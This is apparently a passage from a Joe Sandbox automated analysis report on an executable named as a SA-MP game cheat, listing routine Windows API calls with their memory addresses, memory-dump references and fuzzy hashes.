                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 8f7f71303c8a5835ea5f73358c6c07c6a5e8e756a592bb6c30c41d45c622d872
                                                    • Instruction ID: e3ea4af901d82aeed56373bbf094d4cda39188d912cfd80fa59843e24d322b77
                                                    • Opcode Fuzzy Hash: 8f7f71303c8a5835ea5f73358c6c07c6a5e8e756a592bb6c30c41d45c622d872
                                                    • Instruction Fuzzy Hash: 6321D0711003486FE7B09A65CC89FF7B7DCEB59325F000A19FAE5C21D1C778A9849672
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CF9EC7
                                                    • GetLastError.KERNEL32 ref: 00CF9ED4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 549d292b77e6e50338803d4b1780aff314592df0d6d2701d75f88c24a3030a0f
                                                    • Instruction ID: b102e513f614511230b58012b0b70f1946485ce647c094a7eabe2bdb470caa59
                                                    • Opcode Fuzzy Hash: 549d292b77e6e50338803d4b1780aff314592df0d6d2701d75f88c24a3030a0f
                                                    • Instruction Fuzzy Hash: 00110C306007089BDB78DA25CC80BB6B7E8EB45370F504629E263D26E0D770EE49C771
                                                    APIs
                                                    • _free.LIBCMT ref: 00D18E75
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D31098,00CF17CE,?,?,00000007,?,?,?,00CF13D6,?,00000000), ref: 00D18EB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocAllocate_free
                                                    • String ID:
                                                    • API String ID: 2447670028-0
                                                    • Opcode ID: bc17f2963b940c904d329ffefd5f1995a0c1166291ab8aad6c86c1d9d7171905
                                                    • Instruction ID: a08b0eca56185254871e75c1252c42198321f93f5b31b1c2f5427dc6b450f8ef
                                                    • Opcode Fuzzy Hash: bc17f2963b940c904d329ffefd5f1995a0c1166291ab8aad6c86c1d9d7171905
                                                    • Instruction Fuzzy Hash: 5CF0C2327012017ACB21EA25BC04BEF7758CF82B70F284125F928A6191DF63CDC0B1B0
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00D010AB
                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D010B2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 5b65f5f1e251ca9d4440295c1c7610995ca42e164e36eaaee264f5a086912338
                                                    • Instruction ID: 03cb2265af41024c8323d7feada482eacebce32ec2c9baa0d610e635d8cfa841
                                                    • Opcode Fuzzy Hash: 5b65f5f1e251ca9d4440295c1c7610995ca42e164e36eaaee264f5a086912338
                                                    • Instruction Fuzzy Hash: D0E0D836F00249A7CF198BB49C05AEB73DDEA543043144175E447D3281F934DE424670
                                                    APIs
                                                      • Part of subcall function 00D1BF30: GetEnvironmentStringsW.KERNEL32 ref: 00D1BF39
                                                      • Part of subcall function 00D1BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D1BF5C
                                                      • Part of subcall function 00D1BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D1BF82
                                                      • Part of subcall function 00D1BF30: _free.LIBCMT ref: 00D1BF95
                                                      • Part of subcall function 00D1BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1BFA4
                                                    • _free.LIBCMT ref: 00D182AE
                                                    • _free.LIBCMT ref: 00D182B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                    • String ID:
                                                    • API String ID: 400815659-0
                                                    • Opcode ID: c4c58e9e306b1db100b55845ef26545380539bd112d2c7418b54a7a93f806d46
                                                    • Instruction ID: 1b56e2a609ca14a06360620f822927658cbf7581f367c2b3cef55ba2a610e580
                                                    • Opcode Fuzzy Hash: c4c58e9e306b1db100b55845ef26545380539bd112d2c7418b54a7a93f806d46
                                                    • Instruction Fuzzy Hash: 74E0E527A09A52759A62B2393C426EF0600CF92379B14021AFD10CB1D3CF2089C665BE
                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA501
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA532
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    • Opcode ID: aca39efc36499216df50056b09ceb46865c9b299f486b97bb36ad4f8369a0d26
                                                    • Instruction ID: c6bdff8ed26366bdbdbd24de9ee76f574c5a2e1137a7dbb0f79e717027845f13
                                                    • Opcode Fuzzy Hash: aca39efc36499216df50056b09ceb46865c9b299f486b97bb36ad4f8369a0d26
                                                    • Instruction Fuzzy Hash: F1F0A93220030DBBEF015FA0DC01FEA376DBB14385F488060BA48D6260DB31CAD9EB65
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641,000000FF), ref: 00CFA1F1
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641), ref: 00CFA21F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2643169976-0
                                                    • Opcode ID: e796effd0266fac60b6b7dc7071cd882a77fb1e73e92a049fb15521a60e8cb4c
                                                    • Instruction ID: b10d8a69d3fd7ba29b6ad2f04c61014a606b720eccfcc6818b39533de953f90e
                                                    • Opcode Fuzzy Hash: e796effd0266fac60b6b7dc7071cd882a77fb1e73e92a049fb15521a60e8cb4c
                                                    • Instruction Fuzzy Hash: F3E092712502096BEB115F60DC45FE9779CAB183C2F484021BA48D2150EB61DEC5DA75
                                                    APIs
                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00D22641,000000FF), ref: 00D0ACB0
                                                    • CoUninitialize.COMBASE(?,?,?,?,00D22641,000000FF), ref: 00D0ACB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: GdiplusShutdownUninitialize
                                                    • String ID:
                                                    • API String ID: 3856339756-0
                                                    • Opcode ID: 869542d8bf6581d7a80a5fe9e4e27532b19e44d78bdde314e9fa785c23d6c571
                                                    • Instruction ID: 90d812be2ac2db9240ba133bdc96c90907c84c42fe4ecef0976600294c0d0898
                                                    • Opcode Fuzzy Hash: 869542d8bf6581d7a80a5fe9e4e27532b19e44d78bdde314e9fa785c23d6c571
                                                    • Instruction Fuzzy Hash: 08E06D72604B50EFCB11DB58DC06B49FBA9FB88B20F00426AF416D37B0CB74A801CAA4
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00CFA23A,?,00CF755C,?,?,?,?), ref: 00CFA254
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CFA23A,?,00CF755C,?,?,?,?), ref: 00CFA280
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    • Opcode ID: 6a83da29082318347c690cd099848b309893476f41000fb9880657108e45488c
                                                    • Instruction ID: 12d6375fcf6d8bc0a145274ee35d18a29bf4280afe33eb4d80a76a9397de337a
                                                    • Opcode Fuzzy Hash: 6a83da29082318347c690cd099848b309893476f41000fb9880657108e45488c
                                                    • Instruction Fuzzy Hash: 6FE092725002285BCB60AB64CC05BE9B758AB183E1F044261FE58E3290D771DE85CAF1
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00D0DEEC
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00D0DF03
                                                      • Part of subcall function 00D0B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                      • Part of subcall function 00D0B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                      • Part of subcall function 00D0B568: IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                      • Part of subcall function 00D0B568: TranslateMessage.USER32(?), ref: 00D0B5AC
                                                      • Part of subcall function 00D0B568: DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                    • String ID:
                                                    • API String ID: 2718869927-0
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystem
                                                    • String ID:
                                                    • API String ID: 1175261203-0
                                                    APIs
                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D0A3DA
                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D0A3E1
                                                    Similarity
                                                    • API ID: BitmapCreateFromGdipStream
                                                    • String ID:
                                                    • API String ID: 1918208029-0
                                                    APIs
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D12BAA
                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D12BB5
                                                    Similarity
                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                    • String ID:
                                                    • API String ID: 1660781231-0
                                                    APIs
                                                    Similarity
                                                    • API ID: ItemShowWindow
                                                    • String ID:
                                                    • API String ID: 3351165006-0
                                                    APIs
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    APIs
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF8289
                                                      • Part of subcall function 00CF13DC: __EH_prolog.LIBCMT ref: 00CF13E1
                                                      • Part of subcall function 00CFA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CFA598
                                                    Similarity
                                                    • API ID: H_prolog$CloseFind
                                                    • String ID:
                                                    • API String ID: 2506663941-0
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF13E1
                                                      • Part of subcall function 00CF5E37: __EH_prolog.LIBCMT ref: 00CF5E3C
                                                      • Part of subcall function 00CFCE40: __EH_prolog.LIBCMT ref: 00CFCE45
                                                      • Part of subcall function 00CFB505: __EH_prolog.LIBCMT ref: 00CFB50A
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF13E1
                                                      • Part of subcall function 00CF5E37: __EH_prolog.LIBCMT ref: 00CF5E3C
                                                      • Part of subcall function 00CFCE40: __EH_prolog.LIBCMT ref: 00CFCE45
                                                      • Part of subcall function 00CFB505: __EH_prolog.LIBCMT ref: 00CFB50A
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00D0B098
                                                      • Part of subcall function 00CF13DC: __EH_prolog.LIBCMT ref: 00CF13E1
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,00D23A34), ref: 00D1ACF8
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    APIs
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 90af4bee8c4aa21e408694bc82c3ce5832c0bbcd6bd7a1e4e97ea833f6285f5e
                                                    • Instruction ID: bcfc2b08722824db8af275a566bb4957ebbc61ac7547b2e5cafa5d4c376ea2ac
                                                    • Opcode Fuzzy Hash: 90af4bee8c4aa21e408694bc82c3ce5832c0bbcd6bd7a1e4e97ea833f6285f5e
                                                    • Instruction Fuzzy Hash: 9A01A93390052CABCF51AB68CC41AFEB736FF88750F014515FA16B7251DA34CE04D6A2
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00D13C3F
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: e82833e6739482b48f6d1f2299920148bc24db5e3310e6b1444f6d5982f7715d
                                                    • Instruction ID: bf26394cb339a3dd538453f3949b8f48aa8d17eb714a74a8959bdf846b340a36
                                                    • Opcode Fuzzy Hash: e82833e6739482b48f6d1f2299920148bc24db5e3310e6b1444f6d5982f7715d
                                                    • Instruction Fuzzy Hash: 07F08C32304316AF8F118EA8FC049DA77AAEB41B617184124FA05E6190EF31DAA0C7F0
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 11ecba57625ee9f07fcd8f4c5f294556cd81d00279323297e38efe6a1ebc7024
                                                    • Instruction ID: fe0fdd3432c4e7b3a01d32f028554d4f74dcede90db7751ace0ca64a5ba1e1c0
                                                    • Opcode Fuzzy Hash: 11ecba57625ee9f07fcd8f4c5f294556cd81d00279323297e38efe6a1ebc7024
                                                    • Instruction Fuzzy Hash: 7DE06D3120622576EB71A665BC05BDBB649DF427B4F190121BC58D6192CF22CCC1A2F1
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF5AC2
                                                      • Part of subcall function 00CFB505: __EH_prolog.LIBCMT ref: 00CFB50A
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 7567109a2cf9e4fba776ee856fd067515e0c59ebdb5709129f8e4669c61d81d2
                                                    • Instruction ID: 0516ce318d41ff53c58b3caf0cb64b3fcbf6ac7079b3dcdf6241bbc2aa09c0fd
                                                    • Opcode Fuzzy Hash: 7567109a2cf9e4fba776ee856fd067515e0c59ebdb5709129f8e4669c61d81d2
                                                    • Instruction Fuzzy Hash: 63018C70818694EAD725E7B8C0557EDFBA8DF64304F90848DA55A532C2CBB51B08D7B2
                                                    APIs
                                                      • Part of subcall function 00CFA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6C4
                                                      • Part of subcall function 00CFA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6F2
                                                      • Part of subcall function 00CFA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6FE
                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CFA598
                                                    Similarity
                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                    • String ID:
                                                    • API String ID: 1464966427-0
                                                    • Opcode ID: ee4c6d5e3fd9065840971dd14e2916dec281482dc3193e413d76f7348acb6bce
                                                    • Instruction ID: 1de2337e59709d5a09290adb6a1a1101328a56868ac549a9a497280d2c4ae9fc
                                                    • Opcode Fuzzy Hash: ee4c6d5e3fd9065840971dd14e2916dec281482dc3193e413d76f7348acb6bce
                                                    • Instruction Fuzzy Hash: 1FF08271008794AACBA25BB48905BEBFB906F1A331F048A4AF2FD52196C3755195AB33
                                                    APIs
                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00D00E3D
                                                    Similarity
                                                    • API ID: ExecutionStateThread
                                                    • String ID:
                                                    • API String ID: 2211380416-0
                                                    • Opcode ID: c4ce02d1613b096e50f865d38530e909cb7520dc510438a82498400c8680e920
                                                    • Instruction ID: 9668accd90e4e60855b222ec682b31d2b1a41521338a19e61f870a21e8ae008e
                                                    • Opcode Fuzzy Hash: c4ce02d1613b096e50f865d38530e909cb7520dc510438a82498400c8680e920
                                                    • Instruction Fuzzy Hash: 81D02B0460115966DB253328685A7FE390ACFD7710F0C0025F18DA73C3CF480886B273
                                                    APIs
                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00D0A62C
                                                      • Part of subcall function 00D0A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D0A3DA
                                                    Similarity
                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                    • String ID:
                                                    • API String ID: 1915507550-0
                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction ID: 07189710d2c5012e69cadd7e43ae809ec263bbde75b3419720bc8caaaca9aa7b
                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction Fuzzy Hash: F3D0C97121070ABADF426B698C16B6E7AA9EB00340F448526B98AD51D1EAB2D910A672
                                                    APIs
                                                    • DloadProtectSection.DELAYIMP ref: 00D0E5E3
                                                    Similarity
                                                    • API ID: DloadProtectSection
                                                    • String ID:
                                                    • API String ID: 2203082970-0
                                                    • Opcode ID: 2f59eec29911e17af4a8c8fe3a1ca6d13eabca20038df2d525978cc338a4c9bd
                                                    • Instruction ID: a6d48e2d7c3be665f7e4be4d1da62d9d283a6a2ffe3a7f78bcf0714a82288652
                                                    • Opcode Fuzzy Hash: 2f59eec29911e17af4a8c8fe3a1ca6d13eabca20038df2d525978cc338a4c9bd
                                                    • Instruction Fuzzy Hash: C0D0C9B81C03409AD61AEBA8AD4AB247364F364706F940E05B94DD17D5DA6684C58635
                                                    APIs
                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00D01B3E), ref: 00D0DD92
                                                      • Part of subcall function 00D0B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                      • Part of subcall function 00D0B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                      • Part of subcall function 00D0B568: IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                      • Part of subcall function 00D0B568: TranslateMessage.USER32(?), ref: 00D0B5AC
                                                      • Part of subcall function 00D0B568: DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                    • String ID:
                                                    • API String ID: 897784432-0
                                                    • Opcode ID: 14ef247535b3728c06d88ddf2f2559015924d620645127e4dfc92cb7e04e3f6c
                                                    • Instruction ID: 9ee2424bb5b98b125a4d25513f283739d86ea2a0a244fcfad3df97e7a9575f38
                                                    • Opcode Fuzzy Hash: 14ef247535b3728c06d88ddf2f2559015924d620645127e4dfc92cb7e04e3f6c
                                                    • Instruction Fuzzy Hash: 59D09E31148300BAD6022B51CD06F0A7AA2EB88B05F004559B288740F18A729D31EB35
                                                    APIs
                                                    • GetFileType.KERNELBASE(000000FF,00CF97BE), ref: 00CF98C8
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 9a924100df74273de106d37783abe6c9974775199312509bc520ab31f99c3cfb
                                                    • Instruction ID: 3bc8822c8dfc9d4401c3a3e4dda0ab5c5249623be925dfdd5032fb4af77a9517
                                                    • Opcode Fuzzy Hash: 9a924100df74273de106d37783abe6c9974775199312509bc520ab31f99c3cfb
                                                    • Instruction Fuzzy Hash: 33C01234400209858E744A2498441A57311EB533E5FB48694C138C51E1C333CD87EA12
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
